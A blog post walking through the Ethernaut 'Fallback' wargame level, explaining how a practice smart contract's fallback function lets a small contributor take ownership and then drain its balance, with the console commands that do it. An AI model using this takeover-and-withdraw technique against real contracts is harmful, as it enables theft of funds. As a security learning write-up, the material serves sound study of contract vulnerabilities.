Open in app

Sign in

Write

Sign in

Ethernaut — Level 1 — Fallback

Zuhaib Mohammed
2 min readNov 17, 2021

Ethernaut is an interactive way of learning about common security vulnerabilities in the smart contract by OpenZeppelin. My plan is to complete all the exercises and document my learning.

Before you start, you need to switch to Rinkeby Network in order to deploy the contract and make sure you have some ETH loaded in your Metamask wallet.

So. Lets Begin !

Click here to access the source code

The task at hand is to somehow claim the ownership of the contract and reduce its balance to zero. Few observations after looking at the code.

  1. The constructor sets the owner to the person deploying the contract, in our case OpenZepplin.
  2. An “onlyOwner” modifier declared which makes sure that function with these modifiers can be called by the owner of the smart contract.
  3. A function called “contribute” wherein users can send ETH to the contract but it should be less than 0.001 eth.
  4. “withdraw” function with onlyOwner modifier to make sure only the owner can call this withdraw function. This will basically drain all the funds locked in the smart contract.
  5. Finally a “fallback” function where in you can become the owner, if you have already made some contribution to the smart contract previously and send a value associated with the transaction.

Before we move further, lets understand what are fallback functions -refer to the image below. The are two main use cases of using a fallback function. First is if you are receiving some ETH and second is whenever a non existing function in the smart contract is called.

the fallback function

The Solution

To complete the level. Transfer some ETH to the smart contract by calling the “contribute” function and invoke the fallback function by calling a non-existent function like the one below.

contract.sendTransaction({value: 15})

This will invoke the fallback function and make you the contract owner. You can now withdraw all the funds from the smart contract.

await ethernaut.owner() #Get current owner
contract.withdraw()     #Withdraw funds

Hope you learnt something new today. Stay tuned for more

Thanks for Reading!

Ethereum
Security
Smart Contracts
Blockchain
Defi

--

--

Zuhaib Mohammed

Written by Zuhaib Mohammed

342 Followers

https://linktr.ee/zuhaib44 #cybersecurity #blockchain

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams